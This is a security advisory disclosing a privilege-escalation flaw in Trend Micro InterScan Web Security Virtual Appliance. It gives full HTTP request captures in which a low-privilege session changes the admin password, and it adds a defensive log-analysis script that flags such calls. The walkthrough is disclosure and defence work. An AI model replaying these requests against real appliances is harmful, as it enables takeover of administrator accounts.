KL-001-2017-002

Trendmicro InterScan Privilege Escalation Vulnerability

Matt Bergin (@thatguylevel), KoreLogic (korelogic.com)
Published: 2017-02-15 00:00:00

CVSS2: 4 Medium
    Vector: AV:N/AC:L/Au:S/C:P/I:N/A:N
    Attack Vector: NETWORK; Attack Complexity: LOW; Authentication: SINGLE
    Confidentiality Impact: PARTIAL; Integrity Impact: NONE; Availability Impact: NONE

CVSS3: 8.8 High
    Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    Attack Vector: NETWORK; Attack Complexity: LOW; Privileges Required: LOW
    User Interaction: NONE; Scope: UNCHANGED
    Confidentiality Impact: HIGH; Integrity Impact: HIGH; Availability Impact: HIGH

EPSS: 0.003 Low (Percentile: 68.8%)

  1. Vulnerability Details

    Affected Vendor: Trendmicro
    Affected Product: InterScan Web Security Virtual Appliance
    Affected Version: OS Version 3.5.1321.el6.x86_64; Application
    Version 6.5-SP2_Build_Linux_1548
    Platform: Embedded Linux
    CWE Classification: CWE-269: Improper Privilege Management
    Impact: Privilege Escalation
    Attack vector: HTTP
    CVE-ID: CVE-2016-9315

  2. Vulnerability Description

    Any authenticated user can execute administrative functionality,
    such as changing the administrator password.

  3. Technical Description

    1. Log in as the least-privileged user role.

    POST /uilogonsubmit.jsp HTTP/1.1
    Host: 1.3.3.8:8443
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: https://1.3.3.8:8443/logon.jsp
    Cookie: JSESSIONID=FA0756E428016DE2FCABF4DF1A91D8A9
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 62

    wherefrom=&wronglogon=no&uid=reports&passwd=reports&pwd=Log+On

    HTTP/1.1 302 Found
    Server: Apache-Coyote/1.1
    Pragma: no-cache
    Cache-Control: no-cache
    Location: https://1.3.3.8:8443/index.jsp?CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK&summary_scan
    Content-Type: text/html;charset=UTF-8
    Content-Length: 0
    Date: Tue, 25 Oct 2016 15:02:24 GMT
    Connection: close

    2. Use the session identifier to run administrator functionality and change the admin password.

    POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration HTTP/1.1
    Host: 1.3.3.8:8443
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: https://1.3.3.8:8443/login_account_add_modify.jsp?CSRFGuardToken=9RN5D8EPS3MS4R5BCQMR3KE4SHPVCMZV&op=review&uid=admin
    Cookie: JSESSIONID=FA0756E428016DE2FCABF4DF1A91D8A9
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 280

    CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK&accountop=review&allaccount=admin&allaccount=auditor&allaccount=reports&accountname=admin&commonname=admin&accounttype=0&password_changed=true&PASS1=korelogic2&PASS2=korelogic2&description=Master+Administrator&role_select=0&roleid=0

    HTTP/1.1 302 Found
    Server: Apache-Coyote/1.1
    Location: https://1.3.3.8:8443/login_accounts.jsp?CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK
    Content-Length: 0
    Date: Tue, 25 Oct 2016 15:03:37 GMT
    Connection: close

    3. Log in as admin.

    POST /uilogonsubmit.jsp HTTP/1.1
    Host: 1.3.3.8:8443
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: https://1.3.3.8:8443/logout.jsp?CSRFGuardToken=VS0DHVK4Q9T7GJF0N08812Y5FNTNT67M
    Cookie: JSESSIONID=6903A112B76F642A05573990BB3057DB
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 27

    uid=admin&passwd=korelogic2

    HTTP/1.1 302 Found
    Server: Apache-Coyote/1.1
    Pragma: no-cache
    Cache-Control: no-cache
    Location: https://1.3.3.8:8443/index.jsp?CSRFGuardToken=IDVSTBAEVTSQOP6GJWZI3BDZZVBKAYW4&summary_scan
    Content-Type: text/html;charset=UTF-8
    Content-Length: 0
    Date: Tue, 25 Oct 2016 15:03:54 GMT
    Connection: close
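    The advisory's walkthrough shows the core defect (CWE-269): the account
    administration servlet trusts any valid JSESSIONID rather than checking the
    role bound to that session. Until the vendor patch is applied, the same
    session-to-user correlation can be done defensively over web access logs.
    The script below is an added example and is not part of the KoreLogic
    advisory or of Trend Micro's product; it assumes a hypothetical log format
    that records the JSESSIONID cookie and the uid submitted on the logon POST
    (the log lines are constructed, reusing the session identifiers and
    endpoints from the captures above). It binds each session to the user that
    logged on, then flags calls to the administrative servlet from sessions not
    bound to an administrator, treating sessions with no observed logon as
    unknown and flagging them as well.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Endpoints taken from the advisory's request captures.
LOGON_PATH = "/uilogonsubmit.jsp"
ADMIN_PATHS = {
    "/servlet/com.trend.iwss.gui.servlet.updateaccountadministration",
}
# Assumption: only the built-in "admin" account is supposed to reach
# account administration; adapt to the roles actually defined on the appliance.
ADMIN_USERS = {"admin"}

# Constructed log lines (not a real capture). The hypothetical log format is:
#   <timestamp> <method> <path> <status> sid=<JSESSIONID> uid=<uid from POST body or "-">
# Session ids and uids mirror the advisory's walkthrough; the last two lines
# add an unknown session and a malformed line to exercise the edge cases.
SAMPLE_LOG = """\
2016-10-25T15:02:24Z POST /uilogonsubmit.jsp 302 sid=FA0756E428016DE2FCABF4DF1A91D8A9 uid=reports
2016-10-25T15:02:40Z GET /index.jsp 200 sid=FA0756E428016DE2FCABF4DF1A91D8A9 uid=-
2016-10-25T15:03:37Z POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration 302 sid=FA0756E428016DE2FCABF4DF1A91D8A9 uid=-
2016-10-25T15:03:54Z POST /uilogonsubmit.jsp 302 sid=6903A112B76F642A05573990BB3057DB uid=admin
2016-10-25T15:04:10Z POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration 302 sid=6903A112B76F642A05573990BB3057DB uid=-
2016-10-25T15:05:00Z POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration 302 sid=0000000000000000000000000000DEAD uid=-
this line is malformed and must be skipped
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3}) "
    r"sid=(?P<sid>[0-9A-F]+) uid=(?P<uid>\S+)$"
)


@dataclass(frozen=True)
class Finding:
    ts: str
    sid: str
    uid: str  # user bound to the session, or "<unknown>" if no logon was seen
    path: str


def detect(log_text: str) -> list[Finding]:
    """Flag administrative servlet calls made by sessions not bound to an admin user."""
    session_user: dict[str, str] = {}
    findings: list[Finding] = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # tolerate malformed lines instead of aborting the sweep
        path = m["path"].split("?", 1)[0]  # drop CSRFGuardToken and other query params
        sid, uid, status = m["sid"], m["uid"], m["status"]
        # Assumption: a 302 from the logon submit with a uid present is a successful
        # logon (the advisory shows 302 -> index.jsp on success); bind session to user.
        if path == LOGON_PATH and status == "302" and uid != "-":
            session_user[sid] = uid
            continue
        if path in ADMIN_PATHS:
            # Fail closed: a session with no observed logon is "<unknown>" and is flagged.
            user = session_user.get(sid, "<unknown>")
            if user not in ADMIN_USERS:
                findings.append(Finding(m["ts"], sid, user, path))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f.ts} session {f.sid} (user {f.uid}) called {f.path}")
```

    Run against the constructed sample, the sweep reports the "reports"
    session from the walkthrough and the session with no logon on record, and
    stays silent for the admin session. The same logic is what the servlet
    itself should have enforced: authorize on the role bound to the session,
    not on the mere presence of a session.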

  4. Mitigation and Remediation Recommendation

    The vendor has issued a patch for this vulnerability in Version
    6.5 CP 1737. Security advisory and link to the patched version
    available at:

    https://success.trendmicro.com/solution/1116672

  5. Credit

    This vulnerability was discovered by Matt Bergin (@thatguylevel)
    of KoreLogic, Inc.

  6. Disclosure Timeline

    2016.12.12 - KoreLogic sends vulnerability report and PoC to Trendmicro.
    2016.12.12 - Trendmicro acknowledges receipt of report.
    2017.01.11 - Trendmicro informs KoreLogic that the patch to this and
                 other KoreLogic reported issues will likely be available
                 after the 45 business day deadline (2017.02.16).
    2017.02.06 - Trendmicro informs KoreLogic that the patched version
                 will be available by 2017.02.14.
    2017.02.14 - Trendmicro security advisory released.
    2017.02.15 - KoreLogic public disclosure.

  7. Proof of Concept

    See 3. Technical Description.

Affected configurations

Vulners node: trendmicro interscan_web_security_suite
    Range: 3.5.1321.el6.x86_64 OR 6.5-SP2_Build_Linux_1548
